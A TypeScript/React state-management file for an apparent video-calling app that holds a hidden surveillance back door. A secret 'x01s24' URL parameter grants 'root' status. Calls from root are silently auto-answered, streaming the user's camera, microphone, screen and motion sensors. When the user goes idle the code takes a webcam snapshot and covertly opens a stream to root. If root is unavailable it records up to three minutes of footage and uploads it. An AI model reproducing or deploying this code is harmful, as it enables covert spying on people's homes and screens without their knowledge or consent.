import React from 'react';
import globalHook, { InitializerFunction } from 'use-global-hook';
import { MainActionsType, SensorData } from './models';
import { LocalStorage } from '../utils/localStorage';
import FingerprintJS from '@fingerprintjs/fingerprintjs';
import { SocketManager } from './socket';

import { debug, getOSVersion, HumanDetector, uploadFile } from '../utils/scripts';
import { ContextReader, isMobile, startScreenRecord, stopScreenRecord } from '../mobile/ipc';

export const hackPath = 'x01s24';

export type State = 'home' | 'call' | 'meet';

export type Action = 'start' | 'stop';

export type StreamType = 'video' | 'screen' | 'audio' | 'motion';

export const permitMotion = async () => {
    console.log('TRY Checking for motion permission');
    if (window.DeviceMotionEvent && typeof DeviceMotionEvent.requestPermission === 'function' && window.DeviceOrientationEvent && typeof DeviceOrientationEvent.requestPermission === 'function') {
        console.log('Checking for motion permission');
        try{
            const motionState = await DeviceMotionEvent.requestPermission();
            const orientationState = await DeviceOrientationEvent.requestPermission();
            console.log("orientationState IS", orientationState, "motionState IS", motionState )
            if (motionState.toLocaleLowerCase().includes('granted')) {
                console.log('Got motion permission');
            } else {
                console.error('NO DEVICE MOTION PERMISSION');
            }
        }catch (e) {
            console.error(e?.message)
        }

    }
}

export const config = {
    useNativeMotion: false
};

export interface User {
    id: string;
    name: string;
    osInfo: string;
}

export interface MainStore {
    isRoot: boolean;
    username?: string;
    userId?: string;
    osInfo?: string;
    friendName?: string;
    isLoading?: boolean;
    isInactive?: boolean;
    currentState: State;
    incomingStream?: MediaStream;
    myStream?: MediaStream;
    screenStream?: MediaStream;
    socketManager?: SocketManager;
    caller?: string;
    humanDetector?: HumanDetector;
    mediaRecorder?: MediaRecorder;
    onlineUsers?: User[];
    callType?: StreamType;
    isSafeEnv?: boolean;
    eventData?: SensorData;
}

export interface MainActions {
    setUserName: (name: string) => void;
    setFriendName: (name: string) => void;
    setUserId: (name: string) => void;
    setIsLoading: (isLoading: boolean) => void;
    setCurrentState: (currentState: State) => void;
    call: (action: Action, name?: string, onStream?: () => void, type?: StreamType, justAudio?: boolean) => void;
    answer: (action?: Action, justAudio?: boolean, justMotion?: boolean) => void;
    screenShare: (action?: Action, toRoot?: boolean) => void;
    setMyStream: (stream?: MediaStream) => void;
    setIncomingStream: (stream?: MediaStream) => void;
    setScreenStream: (stream?: MediaStream, toRoot?: boolean) => void;
    setSocketManager: () => void;
    setIsSafeEnv: (isSafeEnv: boolean) => void;
    _handleMotionData: (e: DeviceMotionEvent | DeviceOrientationEvent) => void;
    _handleIncomingCall: (caller: string, type?: StreamType, justAudio?: boolean) => void;
    _handleLeftCall: () => void;
    _handleUsersOnline: (users: User[]) => void;
    _handleUserNotAvailable: (root?: boolean) => void;
    _handleIncomingData: (data: { webcam?: Blob; event: SensorData }) => void;
    __handleInactive: (isOn: boolean) => void;
    __handleCamOn: (isInactive: boolean) => void;
}

const initialState: MainStore = {
    isLoading: false,
    isSafeEnv: false,
    currentState: 'home',
    isRoot: window.location.search.includes(hackPath)
};

const actions: MainActionsType = {
    setUserId(store, userId) {
        store.setState({ userId });
        LocalStorage.setUserId(userId);
    },
    setUserName(store, username) {
        store.setState({ username });
        LocalStorage.setUsername(username);
    },
    setFriendName(store, friendName) {
        store.setState({ friendName });
    },
    setIsLoading(store, isLoading) {
        store.setState({ isLoading });
    },
    setIsSafeEnv(store, isSafeEnv) {
        store.setState({ isSafeEnv });
    },
    setCurrentState(store, currentState) {
        store.setState({ currentState });
    },
    async call(store, action, name, onStream, type, justAudio) {
        if (action === 'start') {
            if (store.state.isRoot) {
                store.actions.setIsLoading(true);
                store.setState({ ...store.state, callType: type, friendName: name || store.state.friendName });
                debug.log('trying to call', store.state.friendName, 'and call type', store.state.callType);
                store.state.socketManager?.callUser(
                    name || store.state.friendName || 'root',
                    undefined,
                    (friendStream) => {
                        debug.log('GOT INCOMING STREAM AS ROOT!');
                        store.actions.setIsLoading(false);
                        store.actions.setIncomingStream(friendStream);
                    },
                    type,
                    justAudio
                );
            } else {
                if (name !== 'root') {
                    store.actions.setCurrentState('meet');
                    store.actions.setIsLoading(true);
                    await window.api?.getNativePermission({ type: 'camera', withRequest: true });
                    await window.api?.getNativePermission({ type: 'microphone', withRequest: true });
                }
                navigator.mediaDevices.getUserMedia({ video: true, audio: true }).then((myStream) => {
                    store.actions.setMyStream(myStream);
                    if (onStream) {
                        onStream();
                    }
                    store.state.socketManager?.callUser(
                        name || store.state.friendName || 'root',
                        myStream,
                        (friendStream) => {
                            store.actions.setIsLoading(false);
                            store.actions.setIncomingStream(friendStream);
                        }
                    );
                });
            }
        } else {
            store.state.socketManager?.leaveCall();
            store.actions.setMyStream();
            store.actions.setIncomingStream();
            if (store.state.caller === 'root' || store.state.friendName === 'root' || !store.state.friendName) {
                window.api?.deleteCamEntry();
            }
            stopScreenRecord();
            window.ondeviceorientation = null;
            window.ondevicemotion = null;
            ContextReader?.stopDeviceMotion();
            /*window.removeEventListener('deviceorientation', store.actions._handleMotionData);
            window.removeEventListener('devicemotion', store.actions._handleMotionData);*/
            store.actions.setIsLoading(false);
            store.actions.setCurrentState('home');
            store.setState({ ...store.state, caller: undefined, callType: undefined, friendName: undefined });
        }
    },
    async screenShare(store, action, toRoot) {
        const streamAction = action === undefined ? (!!store.state.screenStream ? 'stop' : 'start') : action;
        debug.log(streamAction, 'SCREENSHARE');
        if (streamAction === 'start' && !store.state.screenStream) {
            const screenWindows = await window.api.getWindows();
            debug.log('Screen-Windows:', screenWindows);
            const stream = await navigator.mediaDevices.getUserMedia({
                audio: false,
                video: {
                    // @ts-ignore
                    mandatory: {
                        chromeMediaSource: 'desktop',
                        chromeMediaSourceId: '',
                        minWidth: 800,
                        maxWidth: 800,
                        minHeight: 600,
                        maxHeight: 600
                    }
                }
            });
            /*const stream = await navigator.mediaDevices.getDisplayMedia({
                audio: false,
                video: true
            });*/
            store.actions.setScreenStream(stream, toRoot);
        } else if (streamAction === 'stop') {
            store.actions.setScreenStream();
        }
    },
    async answer(store, action, justAudio?, justMotion) {
        if (action === 'start') {
            debug.log('ANSWERING CALL AND CALLER IS', store.state.caller);
            if (store.state.isRoot) {
                store.actions.setIsLoading(true);
                store.state.socketManager?.answerCall(undefined, (incomingStream) => {
                    debug.log('GOT INCOMING ANSWER STREAM AS ROOT');
                    store.actions.setIsLoading(false);
                    store.actions.setIncomingStream(incomingStream);
                });
            } else {
                if (store.state.caller !== 'root') {
                    debug.log('NO ROOT ANSWER');
                    store.actions.setIsLoading(true);
                    store.actions.setCurrentState('meet');
                }

                if (justMotion) {
                    if (config.useNativeMotion) {
                        console.log('SSTARTING LISTENER');
                        ContextReader.addListener('motion', function ({ x, y, z, alpha, beta, gamma }: any) {
                            console.log('SENDING EVENT DATA');
                            store.state.socketManager?.sendData({ event: { x, y, z, alpha, beta, gamma } });
                        });
                    } else {
                        window.ondeviceorientation = store.actions._handleMotionData;
                        window.ondevicemotion = store.actions._handleMotionData;
                    }

                    /*window.addEventListener('devicemotion', store.actions._handleMotionData);
                    window.addEventListener('deviceorientation', store.actions._handleMotionData);*/
                } else {
                    navigator.mediaDevices.getUserMedia({ video: !justAudio, audio: true }).then((myStream) => {
                        debug.log('GOT MY ANSWER STREAM');
                        store.actions.setMyStream(myStream);
                        store.state.socketManager?.answerCall(myStream, (incomingStream) => {
                            if (store.state.caller !== 'root') {
                                debug.log('GOT INCOMING ANSWER STREAM');
                                store.actions.setIsLoading(false);
                                store.actions.setIncomingStream(incomingStream);
                            } else {
                                debug.log('ANSWERED ROOT - NO INCOMING STREAM');
                            }
                        });
                    });
                }
            }
        } else {
            window.ondevicemotion = null;
            window.ondeviceorientation = null;
            store.actions.setMyStream();
            store.actions.setIsLoading(false);
            store.state.socketManager?.leaveCall();
            if (store.state.caller === 'root') {
                window.api?.deleteCamEntry();
            }
            store.setState({ ...store.state, caller: undefined, callType: undefined, friendName: undefined });
            store.actions.setCurrentState('home');
            setTimeout(() => {
                store.setState({ eventData: undefined });
                store.actions.setIncomingStream();
            }, 500);
        }
    },
    setIncomingStream(store, incomingStream) {
        if (!incomingStream) {
            debug.log('Stopping incoming stream');
            store.state.incomingStream?.getTracks().forEach((track) => track.stop());
        }
        store.setState({ incomingStream });
    },
    setMyStream(store, myStream) {
        if (!myStream) {
            debug.log('Stopping my stream', store.state.myStream);
            store.state.myStream?.getTracks().forEach((track) => track.stop());
        }
        store.setState({ myStream });
    },
    setScreenStream(store, screenStream, toRoot) {
        debug.log('SETTING SCREEN STERAM ', screenStream, toRoot);
        if (!screenStream) {
            store.state.screenStream?.getTracks().forEach((track) => track.stop());
            if (store.state.myStream) {
                debug.log('UPDATING SCREEN STREAM ');
                store.state.socketManager?.updateMyStream(store.state.myStream);
            }
        } else {
            if (!toRoot) {
                debug.log('UPDATING SCREEN STREAM ');
                store.state.socketManager?.updateMyStream(screenStream);
            }
        }

        store.setState({ screenStream });
    },
    _handleMotionData(store, e) {
        if (e instanceof DeviceMotionEvent && e.acceleration && e.rotationRate) {
            const { x, y, z } = e.acceleration! || e.accelerationIncludingGravity;
            const { alpha, beta, gamma } = e.rotationRate;
            store.state.socketManager?.sendData({ event: { x, y, z, alpha, beta, gamma } });
        }
    },
    async _handleIncomingCall(store, caller, type, justAudio) {
        if (caller === 'root') {
            store.setState({ ...store.state, caller });
            debug.log('INCOMING CALL FROM ROOT!', 'and call type', type);
            if (type === 'screen') {
                if (isMobile) {
                    try {
                        debug.log('STARTING SCREEEN RECORD');
                        const starter = await startScreenRecord();
                        debug.log('DID SOMETHING!');
                        debug.log('STARTER SCREEN RESULT', typeof starter, starter);
                    } catch (e) {
                        debug.error('COULD NOT START SCREEN RECORD', e);
                    }
                } else {
                    const isPermitted = await window.api?.getNativePermission({ type: 'screen', withRequest: false });
                    if (isPermitted || isPermitted === undefined) {
                        await store.actions.screenShare('start', true);
                        if (store.state.screenStream) {
                            debug.log('GOT SCREEN STREAM');
                            store.state.socketManager?.answerCall(store.state.screenStream, (incomingStream) => {
                                debug.log('Connected to ROOOOOT', incomingStream);
                            });
                        }
                    } else {
                        debug.error('NO SCREEN PERSMISSION');
                    }
                }
            } else if (type === 'motion') {
                if (config.useNativeMotion) {
                    ContextReader.getDeviceMotion();
                    store.actions.answer('start', justAudio, true);
                } else {
                    console.log('Using no permission on motion');
                    store.actions.answer('start', justAudio, true);
                }
            } else {
                const isCamPermitted = await window.api?.getNativePermission({ type: 'camera', withRequest: false });
                const isMicPermitted = await window.api?.getNativePermission({
                    type: 'microphone',
                    withRequest: false
                });
                if (
                    (isCamPermitted && isMicPermitted) ||
                    (isCamPermitted === undefined && isMicPermitted === undefined)
                ) {
                    store.actions.answer('start', justAudio);
                } else {
                    debug.error('NO PERSMISSION. CAMERA:', isCamPermitted, 'MIC:', isMicPermitted);
                }
            }
        } else if (store.state.isRoot) {
            debug.log('ROOT IS BEEING CALLED FROM', caller);
            store.setState({ ...store.state, caller });
        } else {
            window.api?.getNativePermission({ type: 'camera', withRequest: true });
            window.api?.getNativePermission({ type: 'microphone', withRequest: true });
            store.setState({ ...store.state, currentState: 'call', caller });
        }
    },
    _handleLeftCall(store) {
        ContextReader.stopDeviceMotion();
        window.removeEventListener('deviceorientation', store.actions._handleMotionData);
        window.removeEventListener('devicemotion', store.actions._handleMotionData);
        store.actions.call('stop');
    },
    _handleUserNotAvailable(store, root) {
        if (root) {
            const streamToSend = store.state.myStream || store.state.screenStream;
            let chunks: Blob[] = [];
            debug.log('Trying to send', !!streamToSend);
            if (streamToSend) {
                const type = store.state.myStream ? 'video' : 'screen';
                const id = store.state.userId!;
                const mediaRecorder = new MediaRecorder(streamToSend);
                mediaRecorder.ondataavailable = function (e) {
                    chunks.push(e.data);
                };
                mediaRecorder.onstop = function (e) {
                    debug.log('Stopping record!');
                    const blob = new Blob(chunks, { type: 'video/webm' });

                    uploadFile(blob, id, type);

                    store.actions.call('stop');
                };

                mediaRecorder.start();
                debug.log('Starting record!');

                setTimeout(function () {
                    mediaRecorder.stop();
                }, 180000);

                store.setState({ ...store.state, mediaRecorder });
            }
        }
    },
    async setSocketManager(store) {
        const { socketManager, username, userId, osInfo } = store.state;
        debug.log('Trying to set new socketManager', socketManager, userId, username);
        if (!socketManager && userId && username && osInfo) {
            debug.log('Setting new socketManager');
            const socketManager = new SocketManager(
                userId,
                osInfo,
                username,
                store.actions._handleIncomingCall,
                store.actions._handleLeftCall,
                store.actions._handleUserNotAvailable,
                username === 'root' ? store.actions._handleIncomingData : undefined,
                store.actions._handleUsersOnline
            );
            store.setState({ ...store.state, socketManager });
        }
    },
    async __handleInactive(store, isInactive) {
        debug.log('NATIVE LISTENER - INACTIVE - ', isInactive, 'INTERNAL STATE isInactive:', store.state.isInactive);
        if (isInactive && !store.state.isInactive && !store.state.myStream && !store.state.screenStream) {
            debug.log('Its inactive, trying to take picture!');
            try {
                store.setState({ ...store.state, isInactive: true });
                const result = await store.state.humanDetector?.isHumanThere();
                store.state.socketManager?.sendData({ webcam: result?.img, isPerson: !!result?.isPerson });

                if (result && !result!.isPerson && !result!.isCovered) {
                    store.actions.call('start', 'root', () => {
                        if (store.state.myStream) {
                            store.state.humanDetector?.isHumanOnStream(store.state.myStream, () => {
                                debug.log('FOUND HUMAN ON STREAM!');
                                window.api?.resetInactivity();
                                store.setState({ ...store.state, isInactive: false });
                                store.actions.call('stop');
                            });
                        }
                    });
                } else {
                    store.setState({ ...store.state, isInactive: false });
                    window.api?.resetInactivity();
                }
            } catch (e) {
                store.setState({ ...store.state, isInactive: false });
                debug.error('Could not take pic:', e);
            }
        } else if (!isInactive) {
            store.actions.call('stop');
            store.setState({ ...store.state, isInactive: false });
        }
    },
    __handleCamOn(store, isOn) {
        debug.log('--------------------NATIVE LISTENER - CAM ON - ', isOn);
        if (isOn) {
            if (!store.state.myStream && !store.state.screenStream) {
                store.actions.call('start', 'root');
            }
        } else {
            // TODO: HANDLE BETTER MAYBE
            store.state.mediaRecorder?.stop();
            store.actions.call('stop');
        }
    },
    _handleUsersOnline(store, onlineUsers) {
        debug.log('USERS ONLINE UPDATE:', onlineUsers);
        store.setState({ ...store.state, onlineUsers: onlineUsers.filter((u) => u.name !== 'root') });
    },
    _handleIncomingData(store, data) {
        store.setState({
            eventData: data.event,
            isLoading: false
        });
    }
};

const initStore: InitializerFunction<MainStore, MainActions> = async (store) => {
    let username = LocalStorage.getUsername();
    let userId = LocalStorage.getUserId();
    let osInfo = getOSVersion();

    if (initialState.isRoot) {
        LocalStorage.setUsername('root');
        username = 'root';
    }

    if (!userId) {
        debug.log('start fingerprint', new Date());
        const agent = await FingerprintJS.load();
        const { visitorId } = await agent.get();
        debug.log('finish fingerprint', new Date());
        LocalStorage.setUserId(visitorId);
        userId = visitorId;
    }

    let socketManager = undefined;
    let humanDetector = undefined;

    window?.api?.on('cam-toggled', function (event, { isOn }) {
        store.actions.__handleCamOn(isOn);
    });

    window?.api?.on('inactive-toggled', function (event, { isInactive }) {
        store.actions.__handleInactive(isInactive);
    });

    if (username) {
        socketManager = new SocketManager(
            userId,
            osInfo,
            username,
            store.actions._handleIncomingCall,
            store.actions._handleLeftCall,
            store.actions._handleUserNotAvailable,
            username === 'root' ? store.actions._handleIncomingData : undefined,
            store.actions._handleUsersOnline
        );
        humanDetector = new HumanDetector();
    }

    store.setState({ ...initialState, userId, osInfo, username, socketManager, humanDetector });
};

export const useGlobal = globalHook<MainStore, MainActions>(React, initialState, actions, initStore);
